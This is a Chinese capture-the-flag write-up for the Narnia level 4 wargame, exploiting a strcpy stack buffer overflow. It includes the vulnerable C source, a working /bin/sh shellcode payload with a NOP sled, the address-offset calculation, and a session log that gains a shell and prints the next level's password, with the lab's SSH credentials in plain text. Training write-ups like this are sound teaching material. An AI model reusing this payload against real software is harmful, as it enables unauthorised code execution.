narnia4

/** narnia4.c *//*    This program is free software; you can redistribute it and/or modify    it under the terms of the GNU General Public License as published by    the Free Software Foundation; either version 2 of the License, or    (at your option) any later version.    This program is distributed in the hope that it will be useful,    but WITHOUT ANY WARRANTY; without even the implied warranty of    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the    GNU General Public License for more details.    You should have received a copy of the GNU General Public License    along with this program; if not, write to the Free Software    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA*/#include <string.h>#include <stdlib.h>#include <stdio.h>#include <ctype.h>extern char **environ;int main(int argc,char **argv){int i;char buffer[256];for(i = 0; environ[i] != NULL; i++)memset(environ[i], '\0', strlen(environ[i]));if(argc>1)strcpy(buffer,argv[1]);return 0;}

/** nar.c */#include <string.h>#include <stdlib.h>#include <stdio.h>#include <ctype.h>extern char **environ;int main(int argc,char **argv){int i;char buffer[256];        printf("%p\n", buffer);for(i = 0; environ[i] != NULL; i++)memset(environ[i], '\0', strlen(environ[i]));if(argc>1)strcpy(buffer,argv[1]);return 0;}

栈环境

要把shellcode放在buffer中， 但是不知道buffer的地址， 用nar.c计算出buffer的地址

narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit

通过测试我们知道当可执行程序为 ./nar 时， buffer的地址为0xffffd3dc

那我们可以计算出当可执行程序为 /narnia/narnia4 时，buffer的地址为 0xffffd3dc

计算过程如下：

./nar 的长度为5个字节， 根据narnia2了解到， 在环境变量之前有两个字段与argv[0]有关， 那么长度为10字节， 在main函数中有16字节对齐， 那么就是16字节

/narnia/narnia4长度是15字节， 在环境变量之前有两个字段与argv[0]有关， 那么长度为30字节， 在main函数中有16字节对齐， 那么就是32字节

这样就可以知道 以./nar 运行的程序的buffer地址 比 以/narnia/narnia4运行的程序的buffer地址 大16字节

那么以/narnia/narnia4运行的程序的buffer地址为 0xffffd3cc

root@yangq:~# ssh narnia4@178.79.134.250narnia4@178.79.134.250's password: thaenohtainarnia4@melinda:~$ cd /tmp/shadowcoder4narnia4@melinda:/tmp/shadowcoder4$ lsnar  nar.c  narnia4  narnia4.c  sleep.shnarnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protectornarnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`0xffffd3dcSegmentation faultnarnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`0xffffd3dc$ exitnarnia4@melinda:/tmp/shadowcoder4$ /narnia/narnia4 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xcc\xd3\xff\xff"'`$ whoaminarnia5$ cat /etc/narnia_pass/narnia5faimahchiy$